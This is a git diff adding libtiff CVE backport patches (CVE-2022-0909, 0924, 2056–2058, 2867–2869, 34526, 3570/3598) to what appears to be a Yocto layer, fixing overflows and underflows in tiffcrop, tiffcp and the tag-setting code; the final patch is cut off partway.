diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-0909.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-0909.patch
new file mode 100644
index 0000000000..d487f1bd95
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-0909.patch
@@ -0,0 +1,37 @@
+From 32ea0722ee68f503b7a3f9b2d557acb293fc8cde Mon Sep 17 00:00:00 2001
+From: 4ugustus <wangdw.augustus@qq.com>
+Date: Tue, 8 Mar 2022 16:22:04 +0000
+Subject: [PATCH] fix the FPE in tiffcrop (#393)
+
+CVE: CVE-2022-0909
+Upstream-Status: Backport [https://sources.debian.org/src/tiff/4.1.0+git191117-2%7Edeb10u4/debian/patches/CVE-2022-0909.patch/]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+Comment: No change in any hunk
+
+---
+ libtiff/tif_dir.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/libtiff/tif_dir.c b/libtiff/tif_dir.c
+index 57055ca9..59b346ca 100644
+--- a/libtiff/tif_dir.c
++++ b/libtiff/tif_dir.c
+@@ -334,13 +334,13 @@ _TIFFVSetField(TIFF* tif, uint32_t tag, va_list ap)
+ 		break;
+ 	case TIFFTAG_XRESOLUTION:
+         dblval = va_arg(ap, double);
+-        if( dblval < 0 )
++        if( dblval != dblval || dblval < 0 )
+             goto badvaluedouble;
+ 		td->td_xresolution = _TIFFClampDoubleToFloat( dblval );
+ 		break;
+ 	case TIFFTAG_YRESOLUTION:
+         dblval = va_arg(ap, double);
+-        if( dblval < 0 )
++        if( dblval != dblval || dblval < 0 )
+             goto badvaluedouble;
+ 		td->td_yresolution = _TIFFClampDoubleToFloat( dblval );
+ 		break;
+-- 
+GitLab
+
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-0924.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-0924.patch
new file mode 100644
index 0000000000..ddb035c972
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-0924.patch
@@ -0,0 +1,58 @@
+From 88d79a45a31c74cba98c697892fed5f7db8b963a Mon Sep 17 00:00:00 2001
+From: 4ugustus <wangdw.augustus@qq.com>
+Date: Thu, 10 Mar 2022 08:48:00 +0000
+Subject: [PATCH] fix heap buffer overflow in tiffcp (#278)
+
+CVE: CVE-2022-0924
+Upstream-Status: Backport [https://sources.debian.org/src/tiff/4.1.0+git191117-2%7Edeb10u4/debian/patches/CVE-2022-0924.patch/]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+Comment: No change in any hunk
+
+---
+ tools/tiffcp.c | 17 ++++++++++++++++-
+ 1 file changed, 16 insertions(+), 1 deletion(-)
+
+diff --git a/tools/tiffcp.c b/tools/tiffcp.c
+index 224583e0..aa32b118 100644
+--- a/tools/tiffcp.c
++++ b/tools/tiffcp.c
+@@ -1524,12 +1524,27 @@ DECLAREwriteFunc(writeBufferToSeparateSt
+ 	tdata_t obuf;
+ 	tstrip_t strip = 0;
+ 	tsample_t s;
++	uint16 bps = 0, bytes_per_sample;
+ 
+ 	obuf = _TIFFmalloc(stripsize);
+ 	if (obuf == NULL)
+ 		return (0);
+ 	_TIFFmemset(obuf, 0, stripsize);
+ 	(void) TIFFGetFieldDefaulted(out, TIFFTAG_ROWSPERSTRIP, &rowsperstrip);
++	(void) TIFFGetField(out, TIFFTAG_BITSPERSAMPLE, &bps);
++	if( bps == 0 )
++        {
++            TIFFError(TIFFFileName(out), "Error, cannot read BitsPerSample");
++            _TIFFfree(obuf);
++            return 0;
++        }
++        if( (bps % 8) != 0 )
++        {
++            TIFFError(TIFFFileName(out), "Error, cannot handle BitsPerSample that is not a multiple of 8");
++            _TIFFfree(obuf);
++            return 0;
++        }
++	bytes_per_sample = bps/8;
+ 	for (s = 0; s < spp; s++) {
+ 		uint32 row;
+ 		for (row = 0; row < imagelength; row += rowsperstrip) {
+@@ -1539,7 +1539,7 @@ DECLAREwriteFunc(writeBufferToSeparateSt
+ 
+ 			cpContigBufToSeparateBuf(
+ 			    obuf, (uint8*) buf + row*rowsize + s,
+-			    nrows, imagewidth, 0, 0, spp, 1);
++			    nrows, imagewidth, 0, 0, spp, bytes_per_sample);
+ 			if (TIFFWriteEncodedStrip(out, strip++, obuf, stripsize) < 0) {
+ 				TIFFError(TIFFFileName(out),
+ 				    "Error, can't write strip %u",
+-- 
+GitLab
+
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-2056-CVE-2022-2057-CVE-2022-2058.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-2056-CVE-2022-2057-CVE-2022-2058.patch
new file mode 100644
index 0000000000..01e81349a2
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-2056-CVE-2022-2057-CVE-2022-2058.patch
@@ -0,0 +1,183 @@
+From 8261237113a53cd21029c4a8cbb62c47b4c19523 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Wed, 27 Jul 2022 11:30:18 +0530
+Subject: [PATCH] CVE-2022-2056 CVE-2022-2057 CVE-2022-2058
+
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/dd1bcc7abb26094e93636e85520f0d8f81ab0fab]
+CVE: CVE-2022-2056 CVE-2022-2057 CVE-2022-2058
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ libtiff/tif_aux.c |  9 +++++++
+ libtiff/tiffiop.h |  1 +
+ tools/tiffcrop.c  | 62 ++++++++++++++++++++++++++---------------------
+ 3 files changed, 44 insertions(+), 28 deletions(-)
+
+diff --git a/libtiff/tif_aux.c b/libtiff/tif_aux.c
+index 8188db5..3dac542 100644
+--- a/libtiff/tif_aux.c
++++ b/libtiff/tif_aux.c
+@@ -402,6 +402,15 @@ float _TIFFClampDoubleToFloat( double val )
+     return (float)val;
+ }
+ 
++uint32 _TIFFClampDoubleToUInt32(double val)
++{
++    if( val < 0 )
++        return 0;
++    if( val > 0xFFFFFFFFU || val != val )
++        return 0xFFFFFFFFU;
++    return (uint32)val;
++}
++
+ int _TIFFSeekOK(TIFF* tif, toff_t off)
+ {
+     /* Huge offsets, especially -1 / UINT64_MAX, can cause issues */
+diff --git a/libtiff/tiffiop.h b/libtiff/tiffiop.h
+index 45a7932..c6f6f93 100644
+--- a/libtiff/tiffiop.h
++++ b/libtiff/tiffiop.h
+@@ -393,6 +393,7 @@ extern double _TIFFUInt64ToDouble(uint64);
+ extern float _TIFFUInt64ToFloat(uint64);
+ 
+ extern float _TIFFClampDoubleToFloat(double);
++extern uint32 _TIFFClampDoubleToUInt32(double);
+ 
+ extern tmsize_t
+ _TIFFReadEncodedStripAndAllocBuffer(TIFF* tif, uint32 strip,
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index c2c2052..79dd0a0 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -5141,17 +5141,17 @@ computeInputPixelOffsets(struct crop_mask *crop, struct image_data *image,
+       {
+       if ((crop->res_unit == RESUNIT_INCH) || (crop->res_unit == RESUNIT_CENTIMETER))
+         {
+-	x1 = (uint32) (crop->corners[i].X1 * scale * xres);
+-	x2 = (uint32) (crop->corners[i].X2 * scale * xres);
+-	y1 = (uint32) (crop->corners[i].Y1 * scale * yres);
+-	y2 = (uint32) (crop->corners[i].Y2 * scale * yres);
++	x1 = _TIFFClampDoubleToUInt32(crop->corners[i].X1 * scale * xres);
++	x2 = _TIFFClampDoubleToUInt32(crop->corners[i].X2 * scale * xres);
++	y1 = _TIFFClampDoubleToUInt32(crop->corners[i].Y1 * scale * yres);
++	y2 = _TIFFClampDoubleToUInt32(crop->corners[i].Y2 * scale * yres);
+         }
+       else
+         {
+-	x1 = (uint32) (crop->corners[i].X1);
+-	x2 = (uint32) (crop->corners[i].X2);
+-	y1 = (uint32) (crop->corners[i].Y1);
+-	y2 = (uint32) (crop->corners[i].Y2);       
++	x1 = _TIFFClampDoubleToUInt32(crop->corners[i].X1);
++	x2 = _TIFFClampDoubleToUInt32(crop->corners[i].X2);
++	y1 = _TIFFClampDoubleToUInt32(crop->corners[i].Y1);
++	y2 = _TIFFClampDoubleToUInt32(crop->corners[i].Y2);
+ 	}
+       if (x1 < 1)
+         crop->regionlist[i].x1 = 0;
+@@ -5214,17 +5214,17 @@ computeInputPixelOffsets(struct crop_mask *crop, struct image_data *image,
+     {
+     if (crop->res_unit != RESUNIT_INCH && crop->res_unit != RESUNIT_CENTIMETER)
+       { /* User has specified pixels as reference unit */
+-      tmargin = (uint32)(crop->margins[0]);
+-      lmargin = (uint32)(crop->margins[1]);
+-      bmargin = (uint32)(crop->margins[2]);
+-      rmargin = (uint32)(crop->margins[3]);
++      tmargin = _TIFFClampDoubleToUInt32(crop->margins[0]);
++      lmargin = _TIFFClampDoubleToUInt32(crop->margins[1]);
++      bmargin = _TIFFClampDoubleToUInt32(crop->margins[2]);
++      rmargin = _TIFFClampDoubleToUInt32(crop->margins[3]);
+       }
+     else
+       { /* inches or centimeters specified */
+-      tmargin = (uint32)(crop->margins[0] * scale * yres);
+-      lmargin = (uint32)(crop->margins[1] * scale * xres);
+-      bmargin = (uint32)(crop->margins[2] * scale * yres);
+-      rmargin = (uint32)(crop->margins[3] * scale * xres);
++      tmargin = _TIFFClampDoubleToUInt32(crop->margins[0] * scale * yres);
++      lmargin = _TIFFClampDoubleToUInt32(crop->margins[1] * scale * xres);
++      bmargin = _TIFFClampDoubleToUInt32(crop->margins[2] * scale * yres);
++      rmargin = _TIFFClampDoubleToUInt32(crop->margins[3] * scale * xres);
+       }
+ 
+     if ((lmargin + rmargin) > image->width)
+@@ -5254,24 +5254,24 @@ computeInputPixelOffsets(struct crop_mask *crop, struct image_data *image,
+   if (crop->res_unit != RESUNIT_INCH && crop->res_unit != RESUNIT_CENTIMETER)
+     {
+     if (crop->crop_mode & CROP_WIDTH)
+-      width = (uint32)crop->width;
++      width = _TIFFClampDoubleToUInt32(crop->width);
+     else
+       width = image->width - lmargin - rmargin;
+ 
+     if (crop->crop_mode & CROP_LENGTH)
+-      length  = (uint32)crop->length;
++      length  = _TIFFClampDoubleToUInt32(crop->length);
+     else
+       length = image->length - tmargin - bmargin;
+     }
+   else
+     {
+     if (crop->crop_mode & CROP_WIDTH)
+-      width = (uint32)(crop->width * scale * image->xres);
++      width = _TIFFClampDoubleToUInt32(crop->width * scale * image->xres);
+     else
+       width = image->width - lmargin - rmargin;
+ 
+     if (crop->crop_mode & CROP_LENGTH)
+-      length  = (uint32)(crop->length * scale * image->yres);
++      length  = _TIFFClampDoubleToUInt32(crop->length * scale * image->yres);
+     else
+       length = image->length - tmargin - bmargin;
+     }
+@@ -5670,13 +5670,13 @@ computeOutputPixelOffsets (struct crop_mask *crop, struct image_data *image,
+     {
+     if (page->res_unit == RESUNIT_INCH || page->res_unit == RESUNIT_CENTIMETER)
+       { /* inches or centimeters specified */
+-      hmargin = (uint32)(page->hmargin * scale * page->hres * ((image->bps + 7)/ 8));
+-      vmargin = (uint32)(page->vmargin * scale * page->vres * ((image->bps + 7)/ 8));
++      hmargin = _TIFFClampDoubleToUInt32(page->hmargin * scale * page->hres * ((image->bps + 7) / 8));
++      vmargin = _TIFFClampDoubleToUInt32(page->vmargin * scale * page->vres * ((image->bps + 7) / 8));
+       }
+     else
+       { /* Otherwise user has specified pixels as reference unit */
+-      hmargin = (uint32)(page->hmargin * scale * ((image->bps + 7)/ 8));
+-      vmargin = (uint32)(page->vmargin * scale * ((image->bps + 7)/ 8));
++      hmargin = _TIFFClampDoubleToUInt32(page->hmargin * scale * ((image->bps + 7) / 8));
++      vmargin = _TIFFClampDoubleToUInt32(page->vmargin * scale * ((image->bps + 7) / 8));
+       }
+ 
+     if ((hmargin * 2.0) > (pwidth * page->hres))
+@@ -5714,13 +5714,13 @@ computeOutputPixelOffsets (struct crop_mask *crop, struct image_data *image,
+     {
+     if (page->mode & PAGE_MODE_PAPERSIZE )
+       {
+-      owidth  = (uint32)((pwidth * page->hres) - (hmargin * 2));
+-      olength = (uint32)((plength * page->vres) - (vmargin * 2));
++      owidth  = _TIFFClampDoubleToUInt32((pwidth * page->hres) - (hmargin * 2));
++      olength = _TIFFClampDoubleToUInt32((plength * page->vres) - (vmargin * 2));
+       }
+     else
+       {
+-      owidth = (uint32)(iwidth - (hmargin * 2 * page->hres));
+-      olength = (uint32)(ilength - (vmargin * 2 * page->vres));
++      owidth = _TIFFClampDoubleToUInt32(iwidth - (hmargin * 2 * page->hres));
++      olength = _TIFFClampDoubleToUInt32(ilength - (vmargin * 2 * page->vres));
+       }
+     }
+ 
+@@ -5729,6 +5729,12 @@ computeOutputPixelOffsets (struct crop_mask *crop, struct image_data *image,
+   if (olength > ilength)
+     olength = ilength;
+ 
++  if (owidth == 0 || olength == 0)
++  {
++    TIFFError("computeOutputPixelOffsets", "Integer overflow when calculating the number of pages");
++    exit(EXIT_FAILURE);
++  }
++
+   /* Compute the number of pages required for Portrait or Landscape */
+   switch (page->orient)
+     {
+-- 
+2.25.1
+
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-2867-CVE-2022-2868-CVE-2022-2869.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-2867-CVE-2022-2868-CVE-2022-2869.patch
new file mode 100644
index 0000000000..131ff94119
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-2867-CVE-2022-2868-CVE-2022-2869.patch
@@ -0,0 +1,159 @@
+From 07d79fcac2ead271b60e32aeb80f7b4f3be9ac8c Mon Sep 17 00:00:00 2001
+From: Su Laus <sulau@freenet.de>
+Date: Wed, 9 Feb 2022 21:31:29 +0000
+Subject: [PATCH] tiffcrop.c: Fix issue #352 heap-buffer-overflow by correcting
+ uint32_t underflow.
+
+CVE: CVE-2022-2867 CVE-2022-2868 CVE-2022-2869
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/07d79fcac2ead271b60e32aeb80f7b4f3be9ac8c]
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+---
+Index: tiff-4.1.0/tools/tiffcrop.c
+===================================================================
+--- tiff-4.1.0.orig/tools/tiffcrop.c
++++ tiff-4.1.0/tools/tiffcrop.c
+@@ -5153,29 +5153,45 @@ computeInputPixelOffsets(struct crop_mas
+ 	y1 = _TIFFClampDoubleToUInt32(crop->corners[i].Y1);
+ 	y2 = _TIFFClampDoubleToUInt32(crop->corners[i].Y2);
+ 	}
+-      if (x1 < 1)
+-        crop->regionlist[i].x1 = 0;
+-      else
+-        crop->regionlist[i].x1 = (uint32) (x1 - 1);
++      /* a) Region needs to be within image sizes 0.. width-1; 0..length-1 
++       * b) Corners are expected to be submitted as top-left to bottom-right.
++       *    Therefore, check that and reorder input.
++       * (be aware x,y are already casted to (uint32_t) and avoid (0 - 1) )
++       */
++      uint32_t aux;
++      if (x1 > x2) {
++        aux = x1;
++        x1 = x2;
++        x2 = aux;
++      }
++      if (y1 > y2) {
++        aux = y1;
++        y1 = y2;
++        y2 = aux;
++      }
++      if (x1 > image->width - 1)
++        crop->regionlist[i].x1 = image->width - 1;
++      else if (x1 > 0)
++        crop->regionlist[i].x1 = (uint32_t)(x1 - 1);
+ 
+       if (x2 > image->width - 1)
+         crop->regionlist[i].x2 = image->width - 1;
+-      else
+-        crop->regionlist[i].x2 = (uint32) (x2 - 1);
+-      zwidth  = crop->regionlist[i].x2 - crop->regionlist[i].x1 + 1; 
+-
+-      if (y1 < 1)
+-        crop->regionlist[i].y1 = 0;
+-      else
+-        crop->regionlist[i].y1 = (uint32) (y1 - 1);
++      else if (x2 > 0)
++        crop->regionlist[i].x2 = (uint32_t)(x2 - 1);
++
++      zwidth = crop->regionlist[i].x2 - crop->regionlist[i].x1 + 1;
++
++      if (y1 > image->length - 1)
++        crop->regionlist[i].y1 = image->length - 1;
++      else if (y1 > 0)
++        crop->regionlist[i].y1 = (uint32_t)(y1 - 1);
+ 
+       if (y2 > image->length - 1)
+         crop->regionlist[i].y2 = image->length - 1;
+-      else
+-        crop->regionlist[i].y2 = (uint32) (y2 - 1);
+-
+-      zlength = crop->regionlist[i].y2 - crop->regionlist[i].y1 + 1; 
++      else if (y2 > 0)
++        crop->regionlist[i].y2 = (uint32_t)(y2 - 1);
+ 
++      zlength = crop->regionlist[i].y2 - crop->regionlist[i].y1 + 1;
+       if (zwidth > max_width)
+         max_width = zwidth;
+       if (zlength > max_length)
+@@ -5205,7 +5221,7 @@ computeInputPixelOffsets(struct crop_mas
+ 	}
+       }
+     return (0);
+-    }
++    }  /* crop_mode == CROP_REGIONS */
+   
+   /* Convert crop margins into offsets into image
+    * Margins are expressed as pixel rows and columns, not bytes
+@@ -5241,7 +5257,7 @@ computeInputPixelOffsets(struct crop_mas
+       bmargin = (uint32) 0;
+       return (-1);
+       }
+-    }
++    }  /* crop_mode == CROP_MARGINS */
+   else
+     { /* no margins requested */
+     tmargin = (uint32) 0;
+@@ -5332,24 +5348,23 @@ computeInputPixelOffsets(struct crop_mas
+   off->endx   = endx;
+   off->endy   = endy;
+ 
+-  crop_width  = endx - startx + 1;
+-  crop_length = endy - starty + 1;
+-
+-  if (crop_width <= 0)
++  if (endx + 1 <= startx)
+     {
+     TIFFError("computeInputPixelOffsets", 
+                "Invalid left/right margins and /or image crop width requested");
+     return (-1);
+     }
++  crop_width  = endx - startx + 1;
+   if (crop_width > image->width)
+     crop_width = image->width;
+ 
+-  if (crop_length <= 0)
++  if (endy + 1 <= starty)
+     {
+     TIFFError("computeInputPixelOffsets", 
+               "Invalid top/bottom margins and /or image crop length requested");
+     return (-1);
+     }
++  crop_length = endy - starty + 1;
+   if (crop_length > image->length)
+     crop_length = image->length;
+ 
+@@ -5449,10 +5464,17 @@ getCropOffsets(struct image_data *image,
+   else
+     crop->selections = crop->zones;
+ 
+-  for (i = 0; i < crop->zones; i++)
++  /* Initialize regions iterator i */
++  i = 0;
++  for (int j = 0; j < crop->zones; j++)
+     {
+-    seg = crop->zonelist[i].position;
+-    total = crop->zonelist[i].total;
++    seg = crop->zonelist[j].position;
++    total = crop->zonelist[j].total;
++
++    /* check for not allowed zone cases like 0:0; 4:3; etc. and skip that input */
++    if (seg == 0 || total == 0 || seg > total) {
++        continue;
++    }
+ 
+     switch (crop->edge_ref) 
+       {
+@@ -5581,8 +5603,11 @@ getCropOffsets(struct image_data *image,
+                     i + 1, (uint32)zwidth, (uint32)zlength,
+ 		    crop->regionlist[i].x1, crop->regionlist[i].x2, 
+                     crop->regionlist[i].y1, crop->regionlist[i].y2);
++  /* increment regions iterator */
++  i++;
+     }
+-
++    /* set number of generated regions out of given zones */
++    crop->selections = i;
+   return (0);
+   } /* end getCropOffsets */
+ 
+-- 
+GitLab
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-34526.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-34526.patch
new file mode 100644
index 0000000000..cf440ce55f
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-34526.patch
@@ -0,0 +1,29 @@
+From 06386cc9dff5dc162006abe11fd4d1a6fad616cc Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 18 Aug 2022 09:40:50 +0530
+Subject: [PATCH] CVE-2022-34526
+
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/275735d0354e39c0ac1dc3c0db2120d6f31d1990]
+CVE: CVE-2022-34526
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ libtiff/tif_dirinfo.c | 3 +++
+ 1 file changed, 3 insertions(+)
+
+diff --git a/libtiff/tif_dirinfo.c b/libtiff/tif_dirinfo.c
+index 52d53d4..4a1ca00 100644
+--- a/libtiff/tif_dirinfo.c
++++ b/libtiff/tif_dirinfo.c
+@@ -983,6 +983,9 @@ _TIFFCheckFieldIsValidForCodec(TIFF *tif, ttag_t tag)
+ 	    default:
+ 		return 1;
+ 	}
++	if( !TIFFIsCODECConfigured(tif->tif_dir.td_compression) ) {
++		return 0;
++	}
+ 	/* Check if codec specific tags are allowed for the current
+ 	 * compression scheme (codec) */
+ 	switch (tif->tif_dir.td_compression) {
+-- 
+2.25.1
+
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-3570_3598.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-3570_3598.patch
new file mode 100644
index 0000000000..760e20dd2b
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-3570_3598.patch
@@ -0,0 +1,659 @@
+From 226e336cdceec933da2e9f72b6578c7a1bea450b Mon Sep 17 00:00:00 2001
+From: Su Laus <sulau@freenet.de>
+Date: Thu, 13 Oct 2022 14:33:27 +0000
+Subject: [PATCH] tiffcrop subroutines require a larger buffer (fixes #271,
+
+Upstream-Status: Backport [import from debian http://security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u7.debian.tar.xz ]
+CVE: CVE-2022-3570 CVE-2022-3598
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+Origin: https://gitlab.com/libtiff/libtiff/-/commit/cfbb883bf6ea7bedcb04177cc4e52d304522fdff
+Origin: https://gitlab.com/libtiff/libtiff/-/commit/24d3b2425af24432e0e4e2fd58b33f3b04c4bfa4
+Reviewed-by: Sylvain Beucler <beuc@debian.org>
+Last-Update: 2023-01-17
+
+ #381, #386, #388, #389, #435)
+
+---
+ tools/tiffcrop.c | 209 ++++++++++++++++++++++++++---------------------
+ 1 file changed, 117 insertions(+), 92 deletions(-)
+
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index c7877aa..c923920 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -126,6 +126,7 @@ static   char tiffcrop_rev_date[] = "03-03-2010";
+ 
+ #ifdef HAVE_STDINT_H
+ # include <stdint.h>
++# include <inttypes.h>
+ #endif
+ 
+ #ifndef HAVE_GETOPT
+@@ -212,6 +213,10 @@ extern int getopt(int argc, char * const argv[], const char *optstring);
+ 
+ #define TIFF_DIR_MAX  65534
+ 
++/* Some conversion subroutines require image buffers, which are at least 3 bytes
++ * larger than the necessary size for the image itself. */
++#define NUM_BUFF_OVERSIZE_BYTES   3
++
+ /* Offsets into buffer for margins and fixed width and length segments */
+ struct offset {
+   uint32  tmargin;
+@@ -233,7 +238,7 @@ struct offset {
+  */
+ 
+ struct  buffinfo {
+-  uint32 size;           /* size of this buffer */
++  size_t size;           /* size of this buffer */
+   unsigned char *buffer; /* address of the allocated buffer */
+ };
+ 
+@@ -771,8 +776,8 @@ static int readContigTilesIntoBuffer (TIFF* in, uint8* buf,
+   uint32 dst_rowsize, shift_width;
+   uint32 bytes_per_sample, bytes_per_pixel;
+   uint32 trailing_bits, prev_trailing_bits;
+-  uint32 tile_rowsize  = TIFFTileRowSize(in);
+-  uint32 src_offset, dst_offset;
++  tmsize_t tile_rowsize  = TIFFTileRowSize(in);
++  tmsize_t src_offset, dst_offset;
+   uint32 row_offset, col_offset;
+   uint8 *bufp = (uint8*) buf;
+   unsigned char *src = NULL;
+@@ -822,7 +827,7 @@ static int readContigTilesIntoBuffer (TIFF* in, uint8* buf,
+       TIFFError("readContigTilesIntoBuffer", "Integer overflow when calculating buffer size.");
+       exit(-1);
+   }
+-  tilebuf = _TIFFmalloc(tile_buffsize + 3);
++  tilebuf = _TIFFmalloc(tile_buffsize + NUM_BUFF_OVERSIZE_BYTES);
+   if (tilebuf == 0)
+     return 0;
+   tilebuf[tile_buffsize] = 0;
+@@ -986,7 +991,7 @@ static int  readSeparateTilesIntoBuffer (TIFF* in, uint8 *obuf,
+   for (sample = 0; (sample < spp) && (sample < MAX_SAMPLES); sample++)
+     {
+     srcbuffs[sample] = NULL;
+-    tbuff = (unsigned char *)_TIFFmalloc(tilesize + 8);
++    tbuff = (unsigned char *)_TIFFmalloc(tilesize + NUM_BUFF_OVERSIZE_BYTES);
+     if (!tbuff)
+       {
+       TIFFError ("readSeparateTilesIntoBuffer", 
+@@ -1181,7 +1186,8 @@ writeBufferToSeparateStrips (TIFF* out, uint8* buf,
+   }
+   rowstripsize = rowsperstrip * bytes_per_sample * (width + 1); 
+ 
+-  obuf = _TIFFmalloc (rowstripsize);
++  /* Add 3 padding bytes for extractContigSamples32bits */
++  obuf = _TIFFmalloc (rowstripsize + NUM_BUFF_OVERSIZE_BYTES);
+   if (obuf == NULL)
+     return 1;
+   
+@@ -1194,7 +1200,7 @@ writeBufferToSeparateStrips (TIFF* out, uint8* buf,
+       stripsize = TIFFVStripSize(out, nrows);
+       src = buf + (row * rowsize);
+       total_bytes += stripsize;
+-      memset (obuf, '\0', rowstripsize);
++      memset (obuf, '\0',rowstripsize + NUM_BUFF_OVERSIZE_BYTES);
+       if (extractContigSamplesToBuffer(obuf, src, nrows, width, s, spp, bps, dump))
+         {
+         _TIFFfree(obuf);
+@@ -1202,10 +1208,15 @@ writeBufferToSeparateStrips (TIFF* out, uint8* buf,
+ 	}
+       if ((dump->outfile != NULL) && (dump->level == 1))
+         {
+-        dump_info(dump->outfile, dump->format,"", 
++          if ((uint64_t)scanlinesize > 0x0ffffffffULL) {
++              dump_info(dump->infile, dump->format, "loadImage",
++                  "Attention: scanlinesize %"PRIu64" is larger than UINT32_MAX.\nFollowing dump might be wrong.",
++                  (uint64_t)scanlinesize);
++          }
++          dump_info(dump->outfile, dump->format,"",
+                   "Sample %2d, Strip: %2d, bytes: %4d, Row %4d, bytes: %4d, Input offset: %6d", 
+-                  s + 1, strip + 1, stripsize, row + 1, scanlinesize, src - buf);
+-        dump_buffer(dump->outfile, dump->format, nrows, scanlinesize, row, obuf);
++                  s + 1, strip + 1, stripsize, row + 1, (uint32)scanlinesize, src - buf);
++        dump_buffer(dump->outfile, dump->format, nrows, (uint32)scanlinesize, row, obuf);
+ 	}
+ 
+       if (TIFFWriteEncodedStrip(out, strip++, obuf, stripsize) < 0)
+@@ -1232,7 +1243,7 @@ static int writeBufferToContigTiles (TIFF* out, uint8* buf, uint32 imagelength,
+   uint32 tl, tw;
+   uint32 row, col, nrow, ncol;
+   uint32 src_rowsize, col_offset;
+-  uint32 tile_rowsize  = TIFFTileRowSize(out);
++  tmsize_t tile_rowsize  = TIFFTileRowSize(out);
+   uint8* bufp = (uint8*) buf;
+   tsize_t tile_buffsize = 0;
+   tsize_t tilesize = TIFFTileSize(out);
+@@ -1275,9 +1286,11 @@ static int writeBufferToContigTiles (TIFF* out, uint8* buf, uint32 imagelength,
+   }
+   src_rowsize = ((imagewidth * spp * bps) + 7U) / 8;
+ 
+-  tilebuf = _TIFFmalloc(tile_buffsize);
++  /* Add 3 padding bytes for extractContigSamples32bits */
++  tilebuf = _TIFFmalloc(tile_buffsize + NUM_BUFF_OVERSIZE_BYTES);
+   if (tilebuf == 0)
+     return 1;
++  memset(tilebuf, 0, tile_buffsize + NUM_BUFF_OVERSIZE_BYTES);
+   for (row = 0; row < imagelength; row += tl)
+     {
+     nrow = (row + tl > imagelength) ? imagelength - row : tl;
+@@ -1323,7 +1336,8 @@ static int writeBufferToSeparateTiles (TIFF* out, uint8* buf, uint32 imagelength
+ 				       uint32 imagewidth, tsample_t spp, 
+                                        struct dump_opts * dump)
+   {
+-  tdata_t obuf = _TIFFmalloc(TIFFTileSize(out));
++  /* Add 3 padding bytes for extractContigSamples32bits */
++  tdata_t obuf = _TIFFmalloc(TIFFTileSize(out) + NUM_BUFF_OVERSIZE_BYTES);
+   uint32 tl, tw;
+   uint32 row, col, nrow, ncol;
+   uint32 src_rowsize, col_offset;
+@@ -1333,6 +1347,7 @@ static int writeBufferToSeparateTiles (TIFF* out, uint8* buf, uint32 imagelength
+ 
+   if (obuf == NULL)
+     return 1;
++  memset(obuf, 0, TIFFTileSize(out) + NUM_BUFF_OVERSIZE_BYTES);
+ 
+   TIFFGetField(out, TIFFTAG_TILELENGTH, &tl);
+   TIFFGetField(out, TIFFTAG_TILEWIDTH, &tw);
+@@ -1754,14 +1769,14 @@ void  process_command_opts (int argc, char *argv[], char *mp, char *mode, uint32
+                       
+                     *opt_offset = '\0';
+                     /* convert option to lowercase */
+-                    end = strlen (opt_ptr);
++                    end = (unsigned int)strlen (opt_ptr);
+                     for (i = 0; i < end; i++)
+                       *(opt_ptr + i) = tolower((int) *(opt_ptr + i));
+                     /* Look for dump format specification */
+                     if (strncmp(opt_ptr, "for", 3) == 0)
+                       {
+ 		      /* convert value to lowercase */
+-                      end = strlen (opt_offset + 1);
++                      end = (unsigned int)strlen (opt_offset + 1);
+                       for (i = 1; i <= end; i++)
+                         *(opt_offset + i) = tolower((int) *(opt_offset + i));
+                       /* check dump format value */
+@@ -2213,6 +2228,8 @@ main(int argc, char* argv[])
+   size_t length;
+   char   temp_filename[PATH_MAX + 16]; /* Extra space keeps the compiler from complaining */
+ 
++  assert(NUM_BUFF_OVERSIZE_BYTES >= 3);
++
+   little_endian = *((unsigned char *)&little_endian) & '1';
+ 
+   initImageData(&image);
+@@ -3114,13 +3131,13 @@ extractContigSamples32bits (uint8 *in, uint8 *out, uint32 cols,
+       /* If we have a full buffer's worth, write it out */
+       if (ready_bits >= 32)
+         {
+-        bytebuff1 = (buff2 >> 56);
++        bytebuff1 = (uint8)(buff2 >> 56);
+         *dst++ = bytebuff1;
+-        bytebuff2 = (buff2 >> 48);
++        bytebuff2 = (uint8)(buff2 >> 48);
+         *dst++ = bytebuff2;
+-        bytebuff3 = (buff2 >> 40);
++        bytebuff3 = (uint8)(buff2 >> 40);
+         *dst++ = bytebuff3;
+-        bytebuff4 = (buff2 >> 32);
